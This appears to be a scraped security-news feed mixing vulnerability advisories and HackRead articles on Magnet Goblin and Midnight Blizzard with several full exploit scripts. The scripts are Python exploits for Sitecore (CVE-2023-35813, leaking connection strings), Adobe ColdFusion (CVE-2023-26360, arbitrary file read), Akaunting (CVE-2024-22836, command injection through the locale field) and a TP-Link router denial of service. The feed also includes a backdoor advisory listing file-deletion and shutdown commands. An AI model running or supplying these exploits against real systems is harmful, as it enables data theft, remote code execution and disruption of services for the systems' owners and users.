**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to win a race condition.

CVE-2024-21445: Windows USB Print Driver Elevation of Privilege Vulnerability

**Why is this Intel CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in certain processor models offered by Intel. The mitigation for this vulnerability requires a firmware update, and a corresponding Windows updates enables the mitigation. This CVE is being documented in the Security Update Guide to announce that the latest builds of Windows enable the mitigation and are not vulnerable to the issue when paired with the firmware update. Please see the following for more information: https://www.intel.com/content/www/us/en/developer/articles/technical/softwaresecurity-guidance/advisory-guidance/register-file-data-sampling.html

CVE-2023-28746: Intel: CVE-2023-28746 Register File Data Sampling (RFDS)

By Deeba Ahmed
Patch Now! One-Day Vulnerabilities Exploited by Magnet Goblin to Deliver Linux Malware!
This is a post from HackRead.com Read the original post: Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

Hackers exploit unpatched Ivanti vulnerabilities to deploy malware on Linux systems. Magnet Goblin targets businesses using outdated software. Patch immediately and implement strong security measures to protect against these attacks.

Cybersecurity researchers at Check Point are warning of a malicious campaign targeting one-day vulnerabilities in Ivanti and other security software products, potentially impacting a wide range of organizations.

The culprit behind this campaign is a financially motivated hacker group known as Magnet Goblin. This group has been active since January 2022 and specializes in leveraging newly disclosed vulnerabilities, targeting public-facing servers and edge devices.

According to Check Point’s research, Magnet Goblin is using one-day security vulnerabilities to breach edge devices and public-facing services and deploy custom malware on Linux systems. For your information, after zero-day vulnerabilities are disclosed publicly and patches are released, they are referred to as one-day vulnerabilities.

The attackers exploit unpatched servers like Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ to deploy a cross-platform remote access trojan (RAT) called Nerbian RAT, first documented by Proofpoint in 2022. It also utilized Nerbian RAT’s simplified variant, MiniNerbian, which allows arbitrary command execution from a C2 server. 

“NerbianRAT and MiniNerbian… these tools have operated under the radar as they mostly reside on edge devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected,” researchers noted.

NerbianRAT is downloaded from compromised systems with critical Ivanti Connect Secure flaws. While researching, CheckPoint discovered a 1-day vulnerability infection that led to the download of the NerbianRAT Linux variant.

The variant was used to execute various malicious activities on compromised systems, including modifying connection intervals, work time settings, and updating configuration variables.

Magnet Goblin leveraged CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893 in Ivanti VPNs, CVE-2022-24086 in Magento, and CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 in Qlik Sense.

They used a JavaScript credential stealer called Warpwire and the open-source tunnelling tool Ligolo to exploit these vulnerabilities. Warpwire stealer is linked to mass Ivanti vulnerability exploitation and was used in a 2022 Magento server attack. In addition, they used remote monitoring tools ScreenConnect and AnyDesk, targeting Qlik Sense and Apache ActiveMQ.

It is worth noting that Ivanti issued a public advisory in January for CVE-2024-21887, a command injection vulnerability, urging users to patch their systems against wild exploitations. However, Check Point found that Magnet Goblin exploitations occurred within a day of patch issuance, targeting systems not yet patched with available fixed updates.

Compromised Magento servers used in Magnet Goblin campaigns (Screenshot: Checkpoint)

John Gallagher, Vice President of Viakoo Labs at Viakoo commented on the findings stating, “It’s clear that Magnet Goblin is taking the easy route; using recently disclosed vulnerabilities to exploit poorly defended systems. With many edge and IoT devices and applications there is a lag time between when a vulnerability is disclosed and when a patch is available…and then another lag time between when the patch is released and when it is implemented.”

“Often the teams managing edge and IoT systems are outside of IT and may have different priorities or sense of urgency when it comes to patching. One can expect that one-day threats will be a major security issue, as the speed of AI can accelerate these specific types of threats. Until the speed of delivery by threat actors is matched by the speed of response by defenders this will be an ongoing security risk.”

Organisations of all sizes relying on Ivanti software for endpoint management and security are at potential risk. This includes companies in various sectors that utilize Ivanti to safeguard their critical infrastructure.

Therefore, patching Ivanti software is necessary to prevent exploitation along with increased monitoring, and adopting a layered security approach, including implementing Endpoint Detection and Response (EDR) solutions to strengthen the overall security of the network and devices.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Linux Malware “Migo” Exploits Redis for Cryptojacking
3.  Bifrost RAT Targets Linux Devices, Mimics VMware Domain
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  Mirai-based NoaBot Botnet Targeting Linux Systems with Cryptominer

Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

Sitecore version 8.2 suffers from a remote code execution vulnerability.

    #!/usr/bin/env python3## Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla# Google Dork: N/A# Date: 2024-01-08# Vendor Homepage: https://www.sitecore.com/# Software Link: https://dev.sitecore.net/# Version: 10.3# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09# Video POC : https://youtu.be/vWKl9wgdTB0import argparseimport requestsfrom urllib.parse import quotefrom rich.console import Consoleconsole = Console()def initial_test(hostname):    # Initial payload to test vulnerability    test_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='TestVulnerability'    />    '''    encoded_payload = quote(test_payload)    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"    headers = {"Content-Type": "application/x-www-form-urlencoded"}    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)    response = requests.post(url, headers=headers, data=data, verify=False)    # Check for the test string in the Content-Type of the response    return 'TestVulnerability' in response.headers.get('Content-Type', '')def get_payload(choice):    # Payload templates for different options    payloads = {        '1': "<%$ ConnectionStrings:core %>",        '2': "<%$ ConnectionStrings:master %>",        '3': "<%$ ConnectionStrings:web %>"    }    base_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='{}'    />    '''    return base_payload.format(payloads.get(choice, "Invalid"))def main(hostname):    if initial_test(hostname):        print("Exploiting, Please wait...")        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")        print("Select the payload to use:")        print("1: Core connection strings")        print("2: Master connection strings")        print("3: Web connection strings")        payload_choice = input("Enter your choice (1, 2, or 3): ")        payload = get_payload(payload_choice)        encoded_payload = quote(payload)        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"        headers = {"Content-Type": "application/x-www-form-urlencoded"}        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)        response = requests.post(url, headers=headers, data=data)        if 'Content-Type' in response.headers:            print("Content-Type from the response header:")            print("\n")            print(response.headers['Content-Type'])        else:            print("No Content-Type in the response header. Status Code:", response.status_code)    else:        print("The target does not appear to be vulnerable to CVE-2023-35813.")if __name__ == "__main__":    console.print("[bold green]Author: Abhishek Morla[/bold green]")    console.print("[bold red]CVE-2023-35813[/bold red]")    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')    args = parser.parse_args()    main(args.hostname)

Sitecore 8.2 Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

Backdoor.Win32.Beastdoor.oq malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Beastdoor.oqVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.Family: BeastdoorType: PE32MD5: 6268df4c9c805c90725dde4fe5ef6feaVuln ID: MVID-2024-0674Dropped files: svchost.exeDisclosure: 03/09/2024Commands:27 return victims username and computer information5 or 19 will shutdown victims computer6 restart victims computer9 delete all files including program files16 victim computer screen goes black28 returns clipboard information30 terminates the backdoor and deletes it from the systemExploit/PoC:C:\sec>nc64.exe x.x.x.x 13322727VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe2828I dont like u30Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Beastdoor.oq MVID-2024-0674 Remote Command Execution

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Akaunting 3.1.3 Remote Command Execution

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

By Deeba Ahmed
Midnight Blizzard (aka Cozy Bear and APT29) originally breached Microsoft on January 12, 2024.
This is a post from HackRead.com Read the original post: Russian Midnight Blizzard Hackers Breached Microsoft Source Code

Microsoft confirms that Russian state-sponsored hackers, known as Midnight Blizzard, infiltrated their systems and stole source code. Experts warn of potential zero-day vulnerabilities.

Microsoft has been hit by a significant cybersecurity breach, with the company confirming that Russian hackers infiltrated its infrastructure, compromising valuable source code.

The breach, originally discovered on January 12, 2024, and **reported** on January 19, raised concerns about the potential misuse of proprietary information and the security of millions of users relying on Microsoft’s products and services.

Earlier this year, Microsoft disclosed that Russian state-sponsored hackers referred to as Midnight Blizzard (also known as Nobelium, Cozy Bear, and APT29), have been spying on the email accounts of Microsoft’s team members. The group, known for the **devastating SolarWinds attack**, successfully stole source code in what Microsoft now terms an “ongoing attack.”

Reportedly, the hackers infiltrated a “small percentage of corporate email accounts” and stole internal messages and files in an attack that began in late November 2023. The threat actor compromised a non-production test tenant account using a password spray attack, accessing some Microsoft corporate email accounts, including senior leadership and cybersecurity employees, and exfiltrating emails and documents.

The attackers exploited vulnerabilities in Microsoft’s defences, gaining unauthorized access to a substantial portion of source code, including Windows OS components, Office Suite, and other critical software elements.

****Update from Microsoft****

Previously, Microsoft stated that there was no evidence that the “threat actor had any access to customer environments, production systems, source code, or AI systems.” However, as per Microsoft’s update **published** on March 8, 2024, Midnight Blizzard is using information from corporate email systems to gain unauthorized access, including access to source code repositories and internal systems. Still, the company asserts that there’s no evidence that attackers compromised Microsoft-hosted customer-facing systems.

**Midnight Blizzard** is using various tactics to attack Microsoft, some of which were shared between Microsoft and its customers via emails. Moreover, the company claims hackers increased the attack volume, such as password sprays, by up to 10 times in February compared to January.

Microsoft has increased security investments and coordinated cross-enterprise efforts to counter Midnight Blizzard’s persistent threat. The company is enhancing its security controls, detections, and monitoring, as well as conducting ongoing investigations into the group’s activities.

Hackread will continue to share findings and information as they evolve. Users are advised to implement security updates, report suspicious activity, and adhere to security best practices.

**Ariel Parnes**, former Head of the Israeli Intelligence Service Cyber Department, winner of the Israel Defense Prize for tech innovations in the cyber field, and COO and Co-Founder at SaaS incident response leader, Mitiga, shared the following insights with Hackread.com:

“For advanced nation-state cyber groups, access to a company’s source code is akin to finding the master key to its digital kingdom, opening up avenues for finding new zero-day vulnerabilities: undiscovered security flaws that can be exploited before they’re known to the software creators or the public.”

Ariel warned that “Zero-day vulnerabilities represent a critical threat because there’s no straightforward way to detect them until after they’ve been discovered and disclosed by the software creators. Given this challenging landscape, organizations need to double down on cybersecurity measures focused on proactive defence.”

1.  Microsoft Disables App Installer After It’s Abused for Malware
2.  Fake Ledger App on Microsoft Store to Steal $800k in Crypto
3.  Microsoft Azure Exploited to Create Undetectable Cryptominer
4.  Microsoft Teams External Access Abuses for DarkGate Malware
5.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group

Russian Midnight Blizzard Hackers Breached Microsoft Source Code

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

Tag

#windows